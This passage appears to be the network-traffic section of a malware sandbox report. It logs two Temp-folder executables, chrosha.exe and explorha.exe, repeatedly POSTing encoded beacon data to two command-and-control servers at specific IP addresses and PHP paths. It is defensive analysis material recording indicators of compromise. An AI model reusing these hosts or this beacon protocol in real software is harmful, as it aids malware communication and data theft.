Apr 19, 2024 03:30:38.597203970 CEST  219  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
160         192.168.2.5  49999        193.233.132.167  80                8024  C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:30:38.819822073 CEST  155  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:39.068232059 CEST  197  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:39.100039005 CEST  309  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:39.353152990 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
161         192.168.2.5  50000        193.233.132.56  80                4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:30:38.871501923 CEST  312  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:39.132621050 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
162         192.168.2.5  50001        193.233.132.56  80                4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:30:39.488617897 CEST  158  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:39.728652000 CEST  219  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
163         192.168.2.5  50002        193.233.132.167  80                8024  C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:30:39.709104061 CEST  155  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:39.953923941 CEST  197  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:39.957781076 CEST  309  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:40.207191944 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
164 | 192.168.2.5 | 50003 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:39.982269049 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:40.237508059 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
165 | 192.168.2.5 | 50004 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:40.573239088 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:40.823082924 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:40.825916052 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:41.078823090 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
166 | 192.168.2.5 | 50005 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:40.602494001 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:40.851536989 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
167 | 192.168.2.5 | 50006 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:41.100123882 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:41.349332094 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
168 | 192.168.2.5 | 50007 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:41.437313080 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:41.689469099 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:41.690449953 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:41.948496103 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
169 | 192.168.2.5 | 50008 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:41.714231014 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:41.961945057 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
170 | 192.168.2.5 | 50009 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:42.217045069 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:42.466587067 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
171 | 192.168.2.5 | 50010 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:42.301182032 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:42.547590017 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:42.551604033 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:42.804879904 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
172 | 192.168.2.5 | 50011 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:42.828185081 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:43.076931953 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
173 | 192.168.2.5 | 50012 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:43.184144020 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:43.436554909 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:43.439369917 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:43.696753979 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
